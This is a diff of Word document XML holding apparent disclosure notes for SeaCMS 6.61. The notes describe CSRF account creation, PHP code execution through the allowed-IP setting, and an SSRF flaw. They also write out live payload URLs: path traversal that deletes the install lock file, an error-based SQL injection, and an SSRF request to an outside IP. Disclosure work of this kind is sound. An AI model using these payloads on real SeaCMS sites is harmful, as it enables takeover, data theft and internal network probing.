--- a/seacms.docx
+++ b/seacms.docx
@@ -71,28 +71,12 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
           <w:color w:val="24292E"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>After the administrator logged in, open the following two page</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -100,9 +84,17 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>poc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>After the administrator logged in, open the following two page</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -110,16 +102,9 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+        <w:t>poc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -127,8 +112,181 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>one.html---add a user</w:t>
       </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">two.html---add </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>page.The</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> administrator will add a user unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">An issue was discovered in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seacms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add a user account via </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_manager.php?action</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=add.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>page.The</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> administrator will add a user to admin group unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">An issue was discovered in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seacms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add an admin account via </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_manager.php?action</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>save&amp;id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=2.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>

--- a/seacms.docx
+++ b/seacms.docx
@@ -207,87 +207,364 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add a user account via </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add a user account via adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_manager.php?action</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=add.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>adm1n/</w:t>
+        <w:t>page.The</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> administrator will add a user to admin group unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">An issue was discovered in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seacms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add an admin account via adm1n/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>admin_manager.php?action</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>save&amp;id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=2.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Remote Code execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After the admin logged </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>in,visit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>=add.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>csrf</w:t>
+        <w:t xml:space="preserve"> http://127.0.0.1/seacms/adm1n/admin_ip.php to set the allowed </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> as special </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>value,we</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> will get a webshell.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms2.md)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SeaCMS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> v6.61 allows Remote Code execution by placing PHP code in </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> allowed </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> address (aka </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) to /admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_ip.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (aka /adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_ip.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>). The code is executed by visiting adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_ip.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> or data/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. This can also be exploited through CSRF.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>https://github.com/MichaelWayneLIU/seacms/blob/master/seacms2.md</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_template.php?action=del&amp;filedir=../templets/default/html/../../../install/install_lock.txt</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_database.php?action=redat&amp;delfile=1&amp;redStruct=1&amp;bakfiles=/../../../install/install_lock.txt</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_topic_vod.php?tid=-1%20union%20select%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))),2,3,4,5,6,7,8,9</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://207.148.74.197:8888&amp;backurl=admin_reslib.php</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">After the admin logged </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>in,visit</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>page.The</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> administrator will add a user to admin group unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a7"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://{server}:8888&amp;backurl=admin_reslib.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The system will initiate a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> request to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:r>
+        <w:t>{server}</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t>.md)</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">An issue was discovered in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>seacms</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add an admin account via </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>adm1n/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admin_manager.php?action</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>save&amp;id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=2.</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sea</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cms</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> adm1n/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin_reslib.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> has an SSRF vulnerability. The attacker is allowed to initiate a request to the intranet host, obtain the banner information of the web application reachable server service, and collect the fingerprint identification of the intranet web application.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -297,6 +574,44 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -693,6 +1008,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="009537DD"/>
     <w:pPr>
       <w:widowControl w:val="0"/>
       <w:jc w:val="both"/>
@@ -723,7 +1039,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -766,6 +1081,94 @@
     <w:name w:val="js-issue-title"/>
     <w:basedOn w:val="a0"/>
     <w:rsid w:val="004A47D4"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a3">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a4"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D05830"/>
+    <w:pPr>
+      <w:pBdr>
+        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+      </w:pBdr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
+    <w:name w:val="页眉 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a3"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00D05830"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a5">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a6"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D05830"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
+    <w:name w:val="页脚 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a5"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00D05830"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D05830"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
